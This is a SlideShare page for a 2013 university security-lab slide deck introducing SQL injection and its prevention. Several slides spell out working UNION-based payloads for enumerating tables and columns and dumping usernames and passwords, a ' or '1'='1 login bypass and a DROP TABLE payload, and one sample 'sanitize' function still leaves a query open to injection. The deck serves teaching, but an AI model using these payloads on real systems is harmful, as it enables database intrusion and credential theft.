Downloaded 61 times
![<?php
function sanitize($string){
$string = strip_tags($string);
$string = htmlspecialchars($string);
$string = trim(rtrim(ltrim($string)));
$string = mysql_real_escape_string($string);
return $string;
}
$password = sanitize( $_POST["password"] );
mysql_query("UPDATE Users
SET password = '$password'
WHERE user_id = $user_id");](https://image.slidesharecdn.com/basicsqlinjection-130604031652-phpapp01/85/A-Brief-Introduction-in-SQL-Injection-18-320.jpg)
Uploaded bySina Manavi
A Brief Introduction in SQL Injection
This document discusses SQL injection, including what it is, how it works, and how to perform SQL injection attacks to extract information from a database and alter data. It provides examples of SQL queries that can be used to find the number of columns in a table, determine table and column names, and extract or alter data. The document notes that proper input validation and use of prepared statements are needed to prevent SQL injection attacks, and that no single solution can fully prevent SQL injection.
More Related Content
Similar to A Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
- 1. Security Lab, UniversityPutra Malaysia 23 May 2013 Sina Manavi Contact:http ://sinamanavi.blogspot.com/p/about-me.html
- 2. • Introduction • WhySQL Injection • What is needed for this • What you can do with SQL Injection • What are its pros and cons • Why we need to know and how we can prevent our database from SQL injection attacks
- 3. We are allfamiliar with SQL Language One of the technology that helped in converting the static web to dynamic one SQL is relatively easy to read, a little more difficult to write Works on Servers such as Apache, MS Server, etc. SQL Injection means manipulate SQL tables with unauthorized access
- 5. SQL Injectionmay happen only two form of UI based or URL based ◦ (1) Injecting into a form. Such as username and password boxes on a login page. ◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php? pid=10
- 6. Simple example: Select ID from tbl_users ◦ Where ID=“Uid” and pass=“pass” ◦ If it returns any value means that the current inputs are correct
- 7. www.yourtarget.com/list?id=5 ifyou want to view a record from a table by the URL based injection: Select * from tbl_users Where id=5
- 8. The "INFORMATION_SCHEMA"holds the names of every table and column on a site, its name will never change. ◦ Tables holding all the tables name: "INFORMATION_SCHEMA.TABLES.“ ◦ Tables holding all the Column name: "INFORMATION_SCHEMA.COLUMNS.“
- 9. Finding theURL quantity: ◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1-- Increase the 1 , until you got error, then the last number is the column number Finding Table name ◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- And it shows: tbl_user To Be continued
- 10. Now itstime to find out the Column names: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+ WHERE+table_name=‘tbl_user'-- The result would be as following : id,username,password Column names finding step: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS +WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'— Try the columns name until you find your target (e.g username,password, or login)
- 11. And Finallyits time to see the records: ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,username,3+FROM+UserAccounts— And ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,password,3+FROM+UserAccounts— ◦ Username=admin password=123456 ◦ Stupid admin ha ;)
- 12. Now wecan Alter the records as well, lets rock UPDATE tbl_user SET password = SHA2('$password') WHERE id = $id Or we can Insert a new user with Insert Command
- 13. If user_list contains1000 records then, the database is fired up SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list
- 14. Insert newuser intotbl_user The maliciouse code can be : DROP table tbl_user
- 15. How itworks Select * from tbl_users Where id=“Fname” and pass=“pass” Malicious Code: SELECT * FROM table WHERE id= ‘Fname' or '1'='1'; if(mysql_num_rows($result)) //do login Now the unauthorized user get accessed easily and bypassed the authorization
- 16. Security isthe developer’s job No database, connector, or framework can prevent SQL injection all the time
- 17. • Implement properError Handling. This would include using a single error message for all errors. • Lock down User Database configuration, Specify users, roles and permissions etc. • prefix and append a quote to all user input, even if the data is numeric .
- 18. <?php function sanitize($string){ $string =strip_tags($string); $string = htmlspecialchars($string); $string = trim(rtrim(ltrim($string))); $string = mysql_real_escape_string($string); return $string; } $password = sanitize( $_POST["password"] ); mysql_query("UPDATE Users SET password = '$password' WHERE user_id = $user_id");
- 19. Vipin Samar, Oraclevice president of Database Security: “Database Firewall is a good first layer of defense for databases but it won't protect you from everything,”
- 20. Using Stroprocedures: CREATEPROCEDURE SP_show_user(IN U_ID) BEGIN SELECT * FROM Bugs WHERE User_ID= U_ID; END CALL SP_show_user (54) “Might be helpful but still vulnerable”
- 21. I don’thave to worry anymore Escaping is the fixthe fix More escaping is better I can code an escaping function Only user input is unsafe Stored procs are the fixthe fix SQL privileges are the fixthe fix My app doesn’t need security Frameworks are the fixthe fix Parameters quote for you Parameters are the fixthe fix Parameters make queries slow SQL proxies are the fixthe fix NoSQL databases are the fixthe fix
- 22. NoSQL databases areimmune to SQL injection.
Editor's Notes
- #5 Tables have relation with each other . Inserting the row in tables with unauthorized access